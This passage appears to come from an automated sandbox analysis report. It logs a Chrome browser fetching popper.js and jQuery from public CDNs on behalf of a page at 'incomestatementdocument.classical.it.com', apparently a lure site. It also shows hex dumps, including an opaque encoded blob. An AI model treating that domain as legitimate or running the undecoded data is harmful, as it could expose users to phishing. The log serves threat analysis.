                                                                                        2025-03-20 17:47:53 UTC1369INData Raw: 42 7a 32 2f 2b 3e 4b 36 29 51 78 7c 5b 2c 7d 38 36 7c 76 42 74 75 50 31 59 65 24 35 3d 43 71 21 4d 33 41 23 21 60 3e 75 37 71 59 24 2a 54 4a 4b 55 2c 56 21 61 79 4d 6c 2f 65 58 7d 74 6e 50 2b 59 36 48 4b 2b 4c 2c 22 38 3b 76 25 61 58 7c 79 41 6f 6c 52 4f 68 6d 70 37 7e 54 7a 45 70 5d 6c 5a 54 6e 28 60 24 76 4d 44 47 59 66 45 5e 57 70 5f 2c 74 33 60 49 6e 73 6d 5b 5e 4a 5b 58 57 69 7a 6f 65 64 3e 2c 4a 73 42 49 6c 2c 54 61 2e 71 30 2b 70 7c 4f 64 70 50 37 5e 76 29 63 74 2a 60 32 70 23 37 40 35 39 64 37 29 58 72 7b 49 34 5e 7b 25 48 5a 7b 5f 6d 68 42 4f 67 47 32 44 51 7b 4e 45 65 69 4e 2b 4b 37 53 2a 79 7d 7a 49 5d 6b 4a 6a 41 68 38 36 21 76 6f 49 28 68 49 73 7a 51 5f 33 41 23 21 60 3e 75 37 71 59 24 2a 54 4a 50 70 44 5f 55 74 24 58 21 44 21 58 7a 21 2e 2a
                                                                                        Data Ascii: Bz2/+>K6)Qx|[,}86|vBtuP1Ye$5=Cq!M3A#!`>u7qY$*TJKU,V!ayMl/eX}tnP+Y6HK+L,"8;v%aX|yAolROhmp7~TzEp]lZTn(`$vMDGYfE^Wp_,t3`Insm[^J[XWizoed>,JsBIl,Ta.q0+p|OdpP7^v)ct*`2p#7@59d7)Xr{I4^{%HZ{_mhBOgG2DQ{NEeiN+K7S*y}zI]kJjAh86!voI(hIszQ_3A#!`>u7qY$*TJPpD_Ut$X!D!Xz!.*
                                                                                        2025-03-20 17:47:53 UTC93INData Raw: 71 54 34 25 54 2a 3e 64 75 3e 2e 50 37 63 73 4f 4a 72 50 45 5f 26 73 6e 71 3b 4f 61 7a 70 42 42 6d 3d 56 5b 5f 33 28 52 68 41 57 55 6a 2c 58 53 58 63 6d 4f 6b 7a 5b 63 3c 3e 53 2b 2c 4a 21 4f 58 76 30 2e 70 49 21 4b 7a 41 73 36 31 23 2a 6f 65 29 74 61 6b 49 53 45 76 3e 58 0d 0a
                                                                                        Data Ascii: qT4%T*>du>.P7csOJrPE_&snq;OazpBBm=V[_3(RhAWUj,XSXcmOkz[c<>S+,J!OXv0.pI!KzAs61#*oe)takISEv>X
                                                                                        2025-03-20 17:47:53 UTC1369INData Raw: 31 30 38 34 0d 0a 2a 38 5e 70 79 79 58 57 37 39 30 44 68 3d 39 52 37 58 47 6d 5e 44 25 6d 37 5d 7a 4a 36 54 26 44 2a 2e 63 73 4f 53 32 40 74 23 41 4d 50 5a 7c 55 7d 77 60 2b 42 2e 39 4c 68 46 6b 22 5f 67 36 5a 36 37 5e 46 79 73 58 60 2a 3c 3d 46 6f 38 26 3f 37 22 2c 6e 39 2c 63 3d 32 2a 7c 56 63 6a 45 3f 7d 64 57 21 44 61 49 31 28 43 41 79 30 73 23 4f 77 7d 60 6e 68 24 32 24 3d 6a 4a 4b 55 67 36 4a 61 79 4d 65 70 6a 58 62 58 75 66 35 52 22 56 6d 36 44 2a 6f 5e 61 76 6f 4f 3e 5d 6b 32 62 76 66 47 6d 6f 79 63 2b 60 52 22 42 34 6a 30 76 42 5e 4f 35 69 5e 43 5d 75 47 56 58 6b 53 45 76 3e 5b 5f 4f 77 74 37 28 49 66 23 45 49 2f 53 4a 48 32 76 55 78 59 42 4f 28 6e 71 28 7c 28 63 5a 75 66 47 5a 4f 7d 64 2b 60 55 4a 79 56 77 4c 6a 23 2e 3e 25 76 6b 4d 7b 35 68 7b
                                                                                        Data Ascii: 1084*8^pyyXW790Dh=9R7XGm^D%m7]zJ6T&D*.csOS2@t#AMPZ|U}w`+B.9LhFk"_g6Z67^FysX`*<=Fo8&?7",n9,c=2*|VcjE?}dW!DaI1(CAy0s#Ow}`nh$2$=jJKUg6JayMepjXbXuf5R"Vm6D*o^avoO>]k2bvfGmoyc+`R"B4j0vB^O5i^C]uGVXkSEv>[_Owt7(If#EI/SJH2vUxYBO(nq(|(cZufGZO}d+`UJyVwLj#.>%vkM{5h{


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.1649762104.17.24.144436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:54 UTC738OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:54 UTC971INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:47:54 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cf-Ray: 923709928e624286-EWR
                                                                                        Server: cloudflare
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        Etag: W/"649949ff-1afc"
                                                                                        Last-Modified: Mon, 26 Jun 2023 08:19:11 GMT
                                                                                        Cf-Cdnjs-Via: cfworker/r2
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Cf-Cache-Status: HIT
                                                                                        Age: 1733030
                                                                                        Expires: Tue, 10 Mar 2026 17:47:54 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFdU6dW9xO%2F0%2F1QRAUu%2F3FQ1NN6Q8vhbO1NlPsnW5j9n5DWJPjxufJN02YbD8SlmY%2B6eZJ6%2BhRR8F9xQavsaUmXeV4%2FNh%2FTns6LWCQ4QVwcIfxdoIp%2F%2BzJDveg49d2GOIinRvxau"}],"group":"cf-nel","max_age":604800}
                                                                                        Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-20 17:47:54 UTC398INData Raw: 31 62 65 36 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                        Data Ascii: 1be6/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 65 2c 74 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73
                                                                                        Data Ascii: e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;cas
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c
                                                                                        Data Ascii: tion l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFl
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 31 30 29 2c 68 3d 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c
                                                                                        Data Ascii: 10),h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginL
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 74 2e 72 69 67 68 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                        Data Ascii: t.right,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e)
                                                                                        2025-03-20 17:47:54 UTC1276INData Raw: 6e 27 5d 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76
                                                                                        Data Ascii: n']&&console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){v
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 32 66 30 65 0d 0a 70 6f 73 69 74 69 6f 6e 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 74 6f 70 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 5b 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 5d 3d 27 27 29 2c 74 68 69 73 2e 64 69 73 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e
                                                                                        Data Ascii: 2f0eposition='',this.popper.style.top='',this.popper.style[W('transform')]=''),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:win
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 6f 5d 3b 21 31 3d 3d 3d 69 3f 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 6f 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 2c 74 5b 6f 5d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 2c 6f 29 7b 76 61 72 20 69 3d 54 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20
                                                                                        Data Ascii: o];!1===i?e.removeAttribute(o):e.setAttribute(o,t[o])})}function F(e,t,o){var i=T(e,function(e){var o=e.name;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 65 28 73 2b 31 29 29 5d 3b 72 65 74 75 72 6e 20 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6e 3d 28 31 3d 3d 3d 69 3f 21 72 3a 72 29 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 70 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56
                                                                                        Data Ascii: e(s+1))];return a=a.map(function(e,i){var n=(1===i?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 65 7c 7c 21 31 2c 6f 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 27 76 61 6c 75 65 27 69 6e 20 6f 26 26 28 6f 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2e 6b 65 79 2c 6f 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61
                                                                                        Data Ascii: e||!1,o.configurable=!0,'value'in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}return function(t,o,i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writa


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.1649763151.101.2.1374436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:54 UTC713OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:54 UTC562INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 69597
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-10fdd"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Thu, 20 Mar 2025 17:47:54 GMT
                                                                                        Via: 1.1 varnish
                                                                                        Age: 815199
                                                                                        X-Served-By: cache-lga21991-LGA
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 12
                                                                                        X-Timer: S1742492875.596228,VS0,VE0
                                                                                        Vary: Accept-Encoding
                                                                                        2025-03-20 17:47:54 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                        Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                        2025-03-20 17:47:54 UTC16384INData Raw: 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 26 26 6a 5b 32 5d 2c 6d 3d 6e 26 26 71 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 6e 5d 3b 77 68 69 6c 65 28 6d 3d 2b 2b 6e 26 26 6d 26 26 6d 5b 70 5d 7c 7c 28 74 3d 6e 3d 30 29 7c 7c 6f 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 26 26 2b 2b 74 26 26 6d 3d 3d 3d 62 29 7b 6b 5b 61 5d 3d 5b 77 2c 6e 2c 74 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6d 3d 62 2c 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6a 3d 6b 5b 61 5d 7c 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 29 2c 74 3d 3d 3d 21 31 29 77 68 69
                                                                                        Data Ascii: |[],n=j[0]===w&&j[1],t=n&&j[2],m=n&&q.childNodes[n];while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if(1===m.nodeType&&++t&&m===b){k[a]=[w,n,t];break}}else if(s&&(m=b,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n),t===!1)whi
                                                                                        2025-03-20 17:47:54 UTC16384INData Raw: 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 30 2c 69 3d 61 2e 6c 65 6e 67 74 68 2c 6a 3d 6e 75 6c 6c 3d 3d 63 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 72 2e 74 79 70 65 28 63 29 29 7b 65 3d 21 30 3b 66 6f 72 28 68 20 69 6e 20 63 29 54 28 61 2c 62 2c 68 2c 63 5b 68 5d 2c 21 30 2c 66 2c 67 29 7d 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 65 3d 21 30 2c 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 64 29 7c 7c 28 67 3d 21 30 29 2c 6a 26 26 28 67 3f 28 62 2e 63 61 6c 6c 28 61 2c 64 29 2c 62 3d 6e 75 6c 6c 29 3a 28 6a 3d 62 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 6a 2e 63 61 6c 6c 28 72 28 61 29 2c 63 29 7d 29 29 2c 62 29 29 66 6f 72 28 3b 68 3c 69 3b 68 2b 2b 29 62 28 61 5b 68 5d 2c 63 2c 67 3f 64 3a 64 2e 63
                                                                                        Data Ascii: e,f,g){var h=0,i=a.length,j=null==c;if("object"===r.type(c)){e=!0;for(h in c)T(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,r.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(r(a),c)})),b))for(;h<i;h++)b(a[h],c,g?d:d.c
